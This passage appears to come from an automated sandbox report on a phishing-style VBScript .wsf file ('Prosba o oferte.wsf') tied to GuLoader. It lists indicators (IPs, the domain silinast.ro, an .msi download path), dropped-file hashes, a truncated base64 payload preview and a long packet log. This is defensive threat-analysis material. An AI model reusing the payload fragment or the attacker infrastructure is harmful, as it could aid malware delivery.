                        • Number of non-executed functions: 21
                        Cookbook Comments:
                        • Found application associated with file extension: .wsf
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 7468 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7936 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        04:59:20API Interceptor226x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        188.241.183.45g 288322.vbsGet hashmaliciousGuLoaderBrowse
                        • silinast.ro/Loveman232.msi

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        silinast.rog 288322.vbsGet hashmaliciousGuLoaderBrowse
                        • 188.241.183.45
                        Cerere oferta S.C. SHIPYARD ATG GIURGIU S.R.L..vbsGet hashmaliciousGuLoaderBrowse
                        • 188.241.183.45

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        GTSCEGTSCentralEuropeAntelGermanyCZZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 185.146.87.128
                        na.elfGet hashmaliciousUnknownBrowse
                        • 94.42.225.21
                        https://alquimista.hosted.phplist.com/lists/lt.php?tid=cE0FU1AHDgIFBx4AXQpVFAZXX18ZAwJTUx9QXA8AVFIMCQAEUVZKAFQHUVFfBFYUCloJBRlWDQ1SH15cAl1MUAFUAwIDUgNQUFlSHQxTUg1XUF9VGVIHVgUfUlgOUUxZXAZSGFMFDwxZBFdUWAEDAAGet hashmaliciousUnknownBrowse
                        • 188.241.222.249
                        ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 185.146.87.128
                        g 288322.vbsGet hashmaliciousGuLoaderBrowse
                        • 188.241.183.45
                        na.elfGet hashmaliciousMiraiBrowse
                        • 94.42.225.83
                        na.elfGet hashmaliciousMiraiBrowse
                        • 62.168.37.193
                        na.elfGet hashmaliciousMiraiBrowse
                        • 94.42.225.84
                        na.elfGet hashmaliciousMiraiBrowse
                        • 94.42.225.74
                        arm-20241006-0950.elfGet hashmaliciousMiraiBrowse
                        • 212.38.198.232

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):11608
                        Entropy (8bit):4.8908305915084105
                        Encrypted:false
                        SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                        MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                        SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                        SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                        SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1940658735648508
                        Encrypted:false
                        SSDEEP:3:Nlllulbnolz:NllUc
                        MD5:F23953D4A58E404FCB67ADD0C45EB27A
                        SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                        SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                        SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:@...e................................................@..........

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1b4a5mqq.wfo.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jpe3iyr.xo4.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eln5b1fe.wu4.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pf5umom3.s5w.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Roaming\Selvsikkerhedens.Pan

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):482184
                        Entropy (8bit):5.859113802198451
                        Encrypted:false
                        SSDEEP:12288:OHl6CKrv7a9QHzB3zdF/TwsCO7qreFYTSyZNg+:4l6CTc3zXEsCgqKFYmyZd
                        MD5:1FFE621A17628D011F407E9AF5E31D0C
                        SHA1:1F8CEE49BC91220D8F565A78F806B403C3B7FCD8
                        SHA-256:B2BE96DA105DA570CC6613DC7DABEFA5498284BC3BAC631FB4D629410F952851
                        SHA-512:1E22D1EE3D5ADA5DE8F11B0FCDF1CB8045BA49284913BAD247BD477C81287CA035C6D48015DB7A38AC550BC4EDFFFA81AFC91DB66097D76614C9AC01E21BDD90
                        Malicious:false
                        Preview:6wIrJ3EBm7uhWRIA6wI7UnEBmwNcJATrArAd6wIVS7nqte1K6wLPFusCPdWBweCZDANxAZvrAivngfHKT/pN6wI7CXEBm+sCOWpxAZu6CmYhr+sCTORxAZvrAs+X6wLBjzHK6wJ+O3EBm4kUC3EBm3EBm9HicQGb6wKWxoPBBOsCukvrAh30gfkfKUECfMpxAZvrAi+oi0QkBOsCLKRxAZuJw+sCFh7rAmsNgcMFW9kAcQGbcQGbugV1HwXrAmqu6wI1v4HCTNd1vusCLXtxAZuB8lFMlcNxAZtxAZvrAoxccQGb6wJfo+sCG6mLDBDrAg336wIc7IkME+sCctdxAZtCcQGbcQGbgfpo/QQAddTrApxqcQGbiVwkDOsCpyjrAqKQge0AAwAA6wLJ33EBm4tUJAhxAZtxAZuLfCQEcQGbcQGbievrAocJ6wKAb4HDnAAAAHEBm+sC58BT6wJs8usCO6dqQHEBm+sCOc+J63EBm3EBm8eDAAEAAACQVgJxAZtxAZuBwwABAABxAZtxAZtTcQGbcQGbievrAjr6cQGbibsEAQAAcQGbcQGbgcMEAQAA6wIuIOsCojdTcQGb6wI++mr/cQGb6wKTIIPCBXEBm3EBmzH26wI88XEBmzHJ6wJ1rOsCQauLGusC63NxAZtBcQGb6wLUtTkcCnXzcQGbcQGbRnEBm3EBm4B8Cvu4dd/rArvVcQGbi0QK/OsCaW9xAZsp8OsCvW/rAuc1/9JxAZvrAhXQumj9BABxAZtxAZsxwOsCHyBxAZuLfCQMcQGb6wLKvoE0B5KcTJVxAZtxAZuDwATrAqdC6wJzWTnQdeRxAZtxAZuJ+3EBm+sCV9L/1+sC3J1xAZt6nEyVksd0Txt5zXnjQ4icE1g9SVaVGRx3JRu9HTjNZMJRT4UTbSb1gKnNZOcZ0hRV2EGVo39ncRdGzeGfnExwkoZ0ehPoQZWEoHgmE/BBlbWmU9hVGfSUkpw1rWl1zSAqnUyV

                        Static File Info

                        General

                        File type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Entropy (8bit):5.245576267100618
                        TrID:
                        • Visual Basic Script (13500/0) 72.95%
                        • Generic XML (ASCII) (5005/1) 27.05%
                        File name:Prosba o oferte.wsf
                        File size:14'268 bytes
                        MD5:28ce58ca6b41786b0bd031af45f91d89
                        SHA1:7b72d8d9995bc61daf0074e967945ac6ed02a093
                        SHA256:43f28bfd339504ab45e4a3f52f8172036e196ef40e03ffcf6d5626f87a93f0e1
                        SHA512:867dc76350c2ef42ee8c45bd175b5ec00d41dd5f6fb7f91ebab887ab465f4a4fb02952f2ca655c0482be34ea61c8a7c7da77bb429516a2bc932d1952d8041c5d
                        SSDEEP:384:kp7GHbkJgp7zQqoS6sEpmhcM/RJE0cgtepn/2wP:SG7kHvS6sEohn/XVNt2OwP
                        TLSH:5852A448450F1B8E2D532F316E8E3D704EEC8626AF3980117679EEA4F12DC954CBA9DD
                        File Content Preview:<?xml version="1.0" ?>..<job id="Motorically">..<script ..language="VBScript">..' <![CDATA[..Private Const Helnodes = -21686..Private Const Lnnedgang = 1562..Private Const dekuprsave = 18205..Private Const Chondralgia = &HB29E..Private Const Gloominess

                        File Icon

                        Icon Hash:68d69b8f86ab9a86

                        Static OLE Info

                        General

                        Document Type:Text
                        Number of OLE Files:1

                        OLE File "Prosba o oferte.wsf"

                        Indicators
                        Has Summary Info:
                        Application Name:
                        Encrypted Document:False
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:False
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:False
                        Flash Objects Count:0
                        Contains VBA Macros:True

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 8, 2024 10:59:21.936680079 CEST4973780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:21.941601038 CEST8049737188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:21.941693068 CEST4973780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:21.941854954 CEST4973780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:21.946980000 CEST8049737188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:21.947187901 CEST8049737188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:21.959534883 CEST4973880192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:21.964458942 CEST8049738188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:21.964525938 CEST4973880192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:21.964584112 CEST4973880192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:21.969552994 CEST8049738188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:21.969769001 CEST8049738188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:26.545468092 CEST4973980192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:26.551244974 CEST8049739188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:26.551348925 CEST4973980192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:26.551490068 CEST4973980192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:26.556360006 CEST8049739188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:26.556688070 CEST8049739188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:26.557332993 CEST4974080192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:26.562293053 CEST8049740188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:26.562400103 CEST4974080192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:26.562544107 CEST4974080192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:26.567333937 CEST8049740188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:26.567493916 CEST8049740188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:30.611680031 CEST4974180192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:30.618228912 CEST8049741188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:30.618336916 CEST4974180192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:30.618431091 CEST4974180192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:30.624627113 CEST8049741188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:30.624934912 CEST8049741188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:30.625349998 CEST4974280192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:30.630165100 CEST8049742188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:30.630233049 CEST4974280192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:30.630270004 CEST4974280192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:30.635021925 CEST8049742188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:30.635257006 CEST8049742188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:34.627409935 CEST4975180192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:34.632528067 CEST8049751188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:34.632621050 CEST4975180192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:34.632853985 CEST4975180192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:34.637835979 CEST8049751188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:34.637866020 CEST8049751188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:34.638468027 CEST4975280192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:34.643546104 CEST8049752188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:34.643618107 CEST4975280192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:34.643678904 CEST4975280192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:34.648595095 CEST8049752188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:34.648969889 CEST8049752188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:38.642978907 CEST4975380192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:38.649312019 CEST8049753188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:38.649435043 CEST4975380192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:38.649478912 CEST4975380192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:38.655021906 CEST8049753188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:38.655884981 CEST8049753188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:38.656800032 CEST4975480192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:38.662370920 CEST8049754188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:38.662436962 CEST4975480192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:38.662472963 CEST4975480192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:38.667407036 CEST8049754188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:38.667870998 CEST8049754188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.689210892 CEST4975580192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.694581985 CEST8049755188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.694840908 CEST4975580192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.694840908 CEST4975580192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.700072050 CEST8049755188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.700325012 CEST8049755188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.700927973 CEST4975680192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.705878019 CEST8049756188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.706031084 CEST4975680192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.708072901 CEST4975680192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.711604118 CEST8049756188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.711667061 CEST4975680192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:42.713413954 CEST8049756188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:42.716772079 CEST8049756188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:46.721021891 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:46.726466894 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:46.726598024 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:46.726690054 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:46.731753111 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403297901 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403347015 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403382063 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403429985 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.403445959 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403479099 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403513908 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403541088 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.403544903 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403559923 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.403578043 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403609991 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403636932 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.403645039 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.403695107 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.408705950 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.408754110 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.408790112 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.408818960 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.408819914 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.408900023 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516439915 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516494989 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516530037 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516561985 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516593933 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516624928 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516622066 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516622066 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516659975 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516714096 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516771078 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516824007 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516825914 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516858101 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516891003 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516912937 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.516923904 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.516971111 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.517781973 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.517832994 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.517867088 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.517899036 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.517936945 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.517981052 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.517981052 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.518332005 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.518404961 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.518420935 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.518457890 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.518490076 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.518522024 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.518527031 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.518584013 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.519061089 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.519113064 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.519170046 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.521852970 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.561928034 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.628915071 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.628958941 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.628995895 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629021883 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629180908 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629214048 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629229069 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629247904 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629280090 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629292965 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629313946 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629347086 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629374027 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629415035 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629472971 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629571915 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629605055 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629640102 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629646063 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.629672050 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629704952 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.629714966 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.630145073 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630191088 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.630197048 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630228996 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630275965 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.630279064 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630311012 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630343914 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.630350113 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.631094933 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631144047 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.631145000 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631176949 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631218910 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.631256104 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631288052 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631319046 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631335020 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.631354094 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.631417990 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.632055044 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632086992 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632128000 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.632134914 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632167101 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632199049 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.632214069 CEST4975780192.168.2.4188.241.183.45
